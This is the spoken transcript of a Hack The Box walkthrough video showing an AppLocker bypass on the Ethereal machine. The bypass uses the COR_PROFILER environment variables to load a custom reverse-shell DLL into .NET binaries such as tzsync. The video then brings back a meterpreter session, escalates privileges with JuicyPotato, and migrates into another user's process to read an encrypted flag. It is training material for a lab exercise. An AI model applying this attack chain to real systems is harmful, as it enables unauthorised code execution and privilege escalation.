What's going on YouTube? This is Ipsec. I'm doing a technique video of something I want to include in the Ethereal machine, but I just didn't get time to, so we created a addendum video that has a pretty cool AppLocker bypass. So let's jump in. Let's start off by showing the bypass in action, and then we'll step deeper and deeper on how it works until we end up creating our own DLL. So the first thing is we just need any random .NET binary that is not blocked by AppLocker. TZSYNC is a common one. It's time zone synchronization. Generally, you won't block that binary from executing. I don't even know if it allows you to pass any arguments into it. So we're going to set an environment variable called core enable profiling to 1, and then execute the same program, TZSYNC. And now we have a message box that pops up titled injected and says, please subscribe. So what exactly happened there is we have a few environment variables set. If we look, we can see core enable profiling, core profiler, and this, the length of characters is specific. The actual ones don't matter. So if we set this to be all A's, it would still work. And then we got profiler path, which is just a DLL. So these three things will inject into any .NET program you run. If we try like PowerShell, which is also .NET, we see the same message box that gets popped up. So this is different than the living off the land binaries, because these, you pass a program arguments and then take it down a unexpected path, such as reg svcs, where it just accepts a DLL. This, you don't have to pass the program an argument, so you won't see like TZSYNC on the living off the land binaries. This is a new .NET version 4 feature. Before .NET version 4, the core profiler path had to be in the registry under HKey local machine, I believe, so regular users couldn't set it. Now, in .NET version 4, they expanded it to environment variables and domain users can set them, which enables this attack path. So I first came across this reading a post on how to do the fighter machine from HackTheBox, and this post doesn't really go into much of the code, but does go into exactly how it works and what you want to set. And they give you a really nice DLL that we'll use at the end of the video to load meterpreter on a HackTheBox machine and then potato it to do a unintended exploit. Another good reading is if you just Google sub-T core profiler and go in his RSS feed and search like core profiler, we'll see a bunch of things. So this is also a good read, and then these .NET articles are also good. The one thing in this Hack Players article I do want to mention is they talk about a token, Sandbox. Is it Sandbox Inert? Maybe it got edited since I last saw it. But there was a token called Sandbox Inert, and that is patched in like 2016. So since I can't even find where this was mentioned, I won't even talk about it. So if you want, you can Google that token. Essentially, if it comes from a system process, it's a bypass to AppLocker. But if your system, you can bypass AppLocker anyways. But before like 2016 or 2017, users could set that token. So the next thing we want to go, I guess, is to do the actual coding. So let's show this off by creating a reverse shell with this. So we're going to do new project, Visual C, empty project. And then we're going to add a source file. And this is going to be a C++ file. And we'll call this Rev Shell. And now we have to pull a reverse shell off of Google. So I'm going to go to google.com and Google C++ reverse shell GitHub Windows. And we're going to go to the very first result. Look at this reverse shell. Copy. Paste. And we got to set our IP address. This will be our Linux box that is listening. So log in here. NC LVNP will listen on port 9001 because we always like going over 9000. And if config eth0, I am 172.16.10.90. So we can go back here and paste. Clipboard's not shared. And now we have a lot, so delete everything, paste again, make this a bit bigger so you can read it, and set this to 172.16.10. Was it 90? 190. 190 and port 9001. So we also want to change this from a executable to a DLL. So we don't need main. We can just rename this to be Rev Shell. And then we also, actually before we do that, let's compile this and make sure this reverse shell works, because nothing's worse than going down a long path and then realizing it didn't work to begin with. So let's take it from a 32-bit executable to a 64-bit DLL. First thing off, we have a error message, WSocket A, use WSocket W. Let's Google WSocket A MSDN. Let's see. I was hoping to pull up the... We'll just try changing it to WSocket W. I was hoping to see if there's anything difference between these two, but I doubt it. Okay, it's compiled. So now we can just execute this. So we'll go in here, double click on this, go back to a Kali box, and we see the reverse shell did come back. So we know that's good. So let's turn this into a DLL. The first thing is void reverse shell and get rid of these arguments. And now we have to create a header file. So create a new item here, header, rename, rev shell, void. Did I do camel casing or not? I did. Rev shell. Okay. And now we need DLL main. So let's create a new item, C++ again, DLL main. Okay. Let's include windows.h. And now we can just do bool win API DLL main h instance h inst DLL dword forward reason and then LP void LP reserved. Okay, create that function, create a switch, the forward reason, and now upon DLL process attach, we want to do rev shell, and then we can do, we need case, and then case DLL process detach. We won't really do anything here. We also need to include revshell.h. Save this. I mistyped this. There we go. So now we should have a DLL. Let's change this to release 64-bit and convert this to DLL. Build solution. We see it's compiled successfully. Let's copy this, go in this directory, and for ease of sake, we'll just rename this to b.dll and copy this all the way up here. So currently, we can go back to my Linux machine and see we don't have a reverse shell yet. So let's go back to this command prompt and set, where's my history? we'll do set core profiler path is equal to c:\users ipsec b.dll. And now let's do time zone sync. And if we go back to our Kali box, we have a DLL, or a reverse shell. So that is exactly how this all works. So let's see this in action against an actual HackTheBox machine. So let's do it against Ethereal. So let's download the meterpreter reverse shell from them. So let's go to Hack Players, COR PROFILER Bypass. Scroll down to the GitHub. Download this. And then let's do ls in this directory. We'll move downloads, the latest one, Beryllium 2. And we'll call this please subscribe.dll. Okay, so we got that DLL there. The next thing we have to do is set up the Metasploit listener. So let's do that. We can do it here. We'll do msfdb run. I have a habit of typing msf console, which only starts Metasploit, msfdb run, starts the database, and then Metasploit. So trying to get in the habit of always using this. So we can do handler -h, handler -h, and we'll do capital H, ton 0, capital P. We have to do port like 136. Only 73 and 136 are allowed out of this firewall. And then we can do -P for payload, Windows, x64, meterpreter, reverse TCP. And now our handler is listening. So let us go back, and we have to do our sessions -i1 kill exit. It's been a long day. So now we're back to normal. Ignore that shell that came in. We'll do Python 3 ethereal.py. And now we have to copy the file over. So we can use OpenSSL to do that. So if we go into our SMB directory, let's move please subscribe to our SSL, because this has certificates to do the OpenSSL thing. So let's do OpenSSL S server quiet key cert. We want to do on port 73, and we'll call it please subscribe.dll. So now we have to download this. This was in c:\progra 2. Let's just do a dir and I'll speed up the video. I forget exactly the directory. We have to spin up a DNS server. Impacket, not impacket, responder I ton 0. So if you're confused here, watch the Ethereal video. Essentially, we're doing a command injection and getting a response back via DNS because only 2 ports are open, and the AppLocker policies only allow OpenSSL to be executed. Or other programs can, but OpenSSL is the only one that could lead to a shell without doing some crazy AppLocker bypass like we're about to do. So we have the directory we want. It is this OpenSSL-v1.1.0. So we can do c:\progra2 \this. I don't know what's going on there. Let's just type everything in a window below. So we'll do c:\progra2 OpenSSL bin OpenSSL S client quiet connect 10.10.14.3 port 73, and we'll direct this to C:\Windows servicing packages please subscribe.dll. When you're doing any type of like DLL injection or anything, always try to put it in a Windows directory. There's a AppLocker Bypass cheat sheet. If you just Google it on GitHub, you'll find it. That has a bunch of directories you can try. So let's run this command. So I think that ran. We can do a dir against this to see. Run this. We see it sent, but it is 0 in size, so something went wrong. So let's do this again. OpenSSL S server quiet key.pem. And let's copy and paste this again. CMD, please subscribe.dll. I don't think I did that correctly. CMD, paste, enter. There we go. So I think now it has copied. We can do this one more time to see. Do a dir. And hopefully it says something greater than 0 in size. There we go. 16384. That, let's see if that's right. LSLA, SSL, please subscribe. That does not look like it's going to be the right size. So something happened. Let's try that copy again. I have it down here. CMD, paste this in. And hopefully this time it will be different size, at least match up to what's on our Linux box. So apologies for the sloppy edit. I made a typo in a little bit that set me back like 20 minutes, so I'm cutting that part out. So I just kept copying please subscribe until it got to the file size I wanted, which was 93184. This way we get files on the box is really janky and sucks and not reliable. But now we have please subscribe.dll. So we want to go back to the post here and start creating our bat file. They put it all in one. I like doing a bat file because when you screw up, you can just see what you screwed up instead of all in one command to do it blind. So we'll do cmd set core profiling equal to 1, and we'll do it to, let me edit our script. We don't want to get disturbed with just random output. So we can do cmd echo set cores profiling to 1 to C:\users public desktop shortcuts a.bat. So I had done all this and was troubleshooting a lot, and what I missed was the folder shortcuts. So that's why I went back and cut out this video. It's like 1 a.m. right now by me. Actually, 1:15 in the morning, so on Saturday. I was hoping to get this done on the same day I did Ethereal, but maybe I won't. Set this. Put it in a.bat. CMD echo set the next one. And this we have to edit. So this is Windows servicing packages. Please subscribe 3.dll. That goes to the same location. Okay. Then cmd echo set IP 10.10.14.3. cmd echo set port is equal to 136. And then cmd tz echo TZSYNC. And let's see if we get command execution. CMD to this. We have to nest it. There we go. So this CMD in my script just is an alias to CMD/C. So now we got meterpreter session 2 open. If we do sessions, we can see it is running as Alan. So sessions-i2 shell whoami/all. We can see we have the SE impersonate privilege, so let us try to do a rotten potato attack against it. So my TTY there screwed up. That's odd. Control Z showed a background in meterpreter, not my whole metasploit. Search we'll do potato. And then use JuicyPotato. And then this CLS ID is blocked because they tried to block rotten potato, and I think JuicyPotato came out after this machine. So we can do JuicyPotato CLS ID. If you want an explanation of all these CLS IDs, you can watch my fighter video where we'll generate them as well. Let's see. Here we go. Windows 2016. Let's just pick the first one. Set CLS ID. Set session to 2. Set lhost ton 0 just in case it requires it. It says reflection, so it shouldn't do it. Although it is. So we got to set lhost ton 0, set lport 136, show options, and session 2 died. We get session 3. Run this again. Set session 3. We'll do set lhost to 10.10.14.3. Make sure that works. So let's try to run this. It's waiting for a privileged payload. So let's try this one more time. And then we'll try a different CLS ID probably. Sessions. Okay, set session. This is 4. Show options. Set payload. Let's try Windows x64 meterpreter reverse TCP. Option stuck. Let's run this. There we go. So now we got meterpreter session 5 back. I think it was just not setting my architecture to 64-bit because my handler is listening on 64-bit. So once the script gives me access back, we can begin and look if we're system. So sessions, there we go, sessions-i5, and then if we do shell, cd users, RUPL, cd desktop, and root.txt is actually encrypted. If we do cipher/c root.txt, we can see only RUPL can decrypt it. So in order to access this file, we just have to migrate. So if we migrate into something that RUPL owns, like this Notepad, Notepad was not the correct thing to migrate into. Do we still have a shell? We may have to do this all over. cmd session 6, set session 6, run. Let's get our 7th shell. When it comes back, we want to do sessions-i 7. Okay, PS. Let's go for another one that Rupal has. Wonder if VM Tools is kind. Let's see. Rupal. Conhost, no. We'll do cmd.exe. 1596. Can we migrate here? Does not look like it. So something's going on with this box. If you migrate into a process, you will be that user. And if you're that user, you can then access the encrypted files. Session die. Try this one last time. Set session to 8. Run this. And we'll do the VM tools process. Am I getting... Should I be... Nope, I should be doing this one, not PPID. So let's try VM... Oh, that's system. Rupal... Here we go. 4268. We'll try this one. Sessions-i 9. Migrate. And if we don't get in, then you saw we had system on the box. We'll call it a day there. Help. Do we have that session still? Sessions-i 9. PS. Yeah, something really wonky is going on. But if you did this and got this far, try to migrate into a process by Rupal, and then see if you can read the flag. That'll be it for me. Take care, guys. Hope you enjoyed the AppLocker Bypass. Later. So I stopped recording, and I got another session. I tried to do a migrate, and it actually went successfully this time. So let's drop to a shell. And we'll do a who am I. We see we are Rupal. So if we do cd users cd Rupal, cd desktop, and we can do PowerShell get content root.text.length, and it's blocked by group policy. We can type root.text, and I'll hopefully be able to block this in video editing. If not, you see the flag there. So that is the box, and that is what happens if you are the user that can decrypt it. So take care, guys, and I will see you all next week.